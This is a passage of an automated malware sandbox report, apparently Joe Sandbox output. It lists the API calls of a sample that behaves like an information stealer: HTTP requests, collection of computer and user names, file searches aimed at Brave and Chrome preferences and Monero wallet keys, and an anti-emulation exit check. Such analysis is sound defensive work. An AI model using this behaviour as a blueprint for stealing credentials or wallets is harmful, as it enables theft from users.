                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: b26c65dac9c2f1476948facd1e1a4b2260ed459145c421cfb5600313ef2513db
                                • Instruction ID: bd2aa0afd0358578d6d88bb1e01a5d8f568b326052288c778164004ed0001a7e
                                • Opcode Fuzzy Hash: b26c65dac9c2f1476948facd1e1a4b2260ed459145c421cfb5600313ef2513db
                                • Instruction Fuzzy Hash: F9F03470A4430AEAE710BBA09C8ABBE7BB4EB04701F104695B512E12E1DBB15940DBA6

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 26c46732b1fc45a21cba12dda4ee4d1259aa117a9a306b32eaacfdef7cfbd8f0
                                • Instruction ID: 2c84ec9daa027a86a403ea00aa7a4f9a31e0d1891e59e1fdb213db5da5363223
                                • Opcode Fuzzy Hash: 26c46732b1fc45a21cba12dda4ee4d1259aa117a9a306b32eaacfdef7cfbd8f0
                                • Instruction Fuzzy Hash: AF2142B1D00209ABDF14DF54E845ADE7775FB44320F108669F515A72D0EB706605CF91

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B76280: InternetOpenA.WININET(00B90DFE,00000001,00000000,00000000,00000000), ref: 00B762E1
                                  • Part of subcall function 00B76280: StrCmpCA.SHLWAPI(?,0093E310), ref: 00B76303
                                  • Part of subcall function 00B76280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B76335
                                  • Part of subcall function 00B76280: HttpOpenRequestA.WININET(00000000,GET,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B76385
                                  • Part of subcall function 00B76280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B763BF
                                  • Part of subcall function 00B76280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B763D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B85228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: a8e64bbc5c737196e56236f2f3e33592ebd88d2dd25ba46f064d05691070e11c
                                • Instruction ID: 98b02294343ad2d874c1f4b128df6bfb448b2d75db869a059c590addb6ce1499
                                • Opcode Fuzzy Hash: a8e64bbc5c737196e56236f2f3e33592ebd88d2dd25ba46f064d05691070e11c
                                • Instruction Fuzzy Hash: 9D110330910148A7DB18FF64DD92AED77F8AF50300F4085D9F81A565A2EF35AB05D7A2
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B7112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00B71132
                                • ExitProcess.KERNEL32 ref: 00B71143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 30c2759cec72fa66938dd0d33ce8304d2ca2e06b2b38e2701346fdb140c3e532
                                • Instruction ID: 7cf3b22dd77344797e578a17a82a6ee93e22a5043ad09573261e48aec3e744b3
                                • Opcode Fuzzy Hash: 30c2759cec72fa66938dd0d33ce8304d2ca2e06b2b38e2701346fdb140c3e532
                                • Instruction Fuzzy Hash: A9E0E674949348FBE7106BA9DC0AB0976B8EB04B01F504594F709BA6D0D6B5264096B9
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B710B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00B710F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 3e97b3c5514f51ea3f12fdd35650ab063a5939ae465a4ae317a00597de24e809
                                • Instruction ID: ab61ce957f0eb807add10727631e035b8d2bda369e71cdadf96fc2f7651e09ea
                                • Opcode Fuzzy Hash: 3e97b3c5514f51ea3f12fdd35650ab063a5939ae465a4ae317a00597de24e809
                                • Instruction Fuzzy Hash: 01F0E271641308FBE7149AACAC49FAEB7ECE705B15F305988F504E3280D5719E00CAA0
                                APIs
                                  • Part of subcall function 00B878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87910
                                  • Part of subcall function 00B878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B87917
                                  • Part of subcall function 00B878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B8792F
                                  • Part of subcall function 00B87850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B711B7), ref: 00B87880
                                  • Part of subcall function 00B87850: RtlAllocateHeap.NTDLL(00000000), ref: 00B87887
                                  • Part of subcall function 00B87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B8789F
                                • ExitProcess.KERNEL32 ref: 00B711C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 5ebd8b5a80d356fe8b133ae3e8337e1e8190b3ee6a284180fcbca8f9af6e0170
                                • Instruction ID: c798ea394ead71e2794b97dcce8805c902080c8ae59e38843490a2469cc6d0af
                                • Opcode Fuzzy Hash: 5ebd8b5a80d356fe8b133ae3e8337e1e8190b3ee6a284180fcbca8f9af6e0170
                                • Instruction Fuzzy Hash: 01E0C2B1914301E3CA0037FEAC0AB2A33CC9B00349F4409A4FA08D22A2FE25E800C776
                                APIs
                                • wsprintfA.USER32 ref: 00B838CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B838E3
                                • lstrcat.KERNEL32(?,?), ref: 00B83935
                                • StrCmpCA.SHLWAPI(?,00B90F70), ref: 00B83947
                                • StrCmpCA.SHLWAPI(?,00B90F74), ref: 00B8395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B83C67
                                • FindClose.KERNEL32(000000FF), ref: 00B83C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 7115f0d304201231a1efbad17f39122c6bc426ca112e3676d819d26ab9cbda05
                                • Instruction ID: 4606b5e2c5d75d88063adf5fc6707011851dcc6b45a76c49fdc2d7999d776058
                                • Opcode Fuzzy Hash: 7115f0d304201231a1efbad17f39122c6bc426ca112e3676d819d26ab9cbda05
                                • Instruction Fuzzy Hash: 74A12FB1900318EBDB24EB64DC85FEE73B8FB48700F0446D8A50D96151EB759B84CF62
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00B90B32,00B90B2B,00000000,?,?,?,00B913F4,00B90B2A), ref: 00B7BEF5
                                • StrCmpCA.SHLWAPI(?,00B913F8), ref: 00B7BF4D
                                • StrCmpCA.SHLWAPI(?,00B913FC), ref: 00B7BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7C7BF
                                • FindClose.KERNEL32(000000FF), ref: 00B7C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 685f058ff87aec0665d30f572564524201e781f7bf16fa4cceaf0010ddee516c
                                • Instruction ID: 5a04c6664b6c0047bfa831b627daed67bd34a012735a95cc97297af955113dfb
                                • Opcode Fuzzy Hash: 685f058ff87aec0665d30f572564524201e781f7bf16fa4cceaf0010ddee516c
                                • Instruction Fuzzy Hash: 91425672910104ABDB14FB74DD96EED73BCAF54300F4085D9F50AA61A1EE34AF49CBA2
                                APIs
                                • wsprintfA.USER32 ref: 00B8492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B84943
                                • StrCmpCA.SHLWAPI(?,00B90FDC), ref: 00B84971
                                • StrCmpCA.SHLWAPI(?,00B90FE0), ref: 00B84987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B84B7D
                                • FindClose.KERNEL32(000000FF), ref: 00B84B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 2a31cd1c81f7f8508d5302657044442a36d9255c4bbe3009cd82b63502b14e8b
                                • Instruction ID: cacf46554050c8952c9f82ae71f96439dc6321b7ed8669c0a940b499d78b1cac
                                • Opcode Fuzzy Hash: 2a31cd1c81f7f8508d5302657044442a36d9255c4bbe3009cd82b63502b14e8b
                                • Instruction Fuzzy Hash: FE6154B2910219EBCB24FBA4DC45FEA73BCBB48700F0486D8F60996151EB759B45CFA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B84580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B84587
                                • wsprintfA.USER32 ref: 00B845A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B845BD
                                • StrCmpCA.SHLWAPI(?,00B90FC4), ref: 00B845EB
                                • StrCmpCA.SHLWAPI(?,00B90FC8), ref: 00B84601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B8468B
                                • FindClose.KERNEL32(000000FF), ref: 00B846A0
                                • lstrcat.KERNEL32(?,0093E220), ref: 00B846C5
                                • lstrcat.KERNEL32(?,0093D6F8), ref: 00B846D8
                                • lstrlen.KERNEL32(?), ref: 00B846E5
                                • lstrlen.KERNEL32(?), ref: 00B846F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: bb5721cd9b5607ddf8abd6fe9bd8efbe653ccd28cb5c2f89edc2a5e54f2bac69
                                • Instruction ID: d3e790ecf97e7e4d35555f764a0d862a62232acad1752f3ba58ca3c42ac8a567
                                • Opcode Fuzzy Hash: bb5721cd9b5607ddf8abd6fe9bd8efbe653ccd28cb5c2f89edc2a5e54f2bac69
                                • Instruction Fuzzy Hash: 925111B5950218EBCB24FB74DC89BE973B8AB58700F4046D8A61996150EB749B84CFA1
                                APIs
                                • wsprintfA.USER32 ref: 00B83EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B83EDA
                                • StrCmpCA.SHLWAPI(?,00B90FAC), ref: 00B83F08
                                • StrCmpCA.SHLWAPI(?,00B90FB0), ref: 00B83F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B8406C
                                • FindClose.KERNEL32(000000FF), ref: 00B84081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
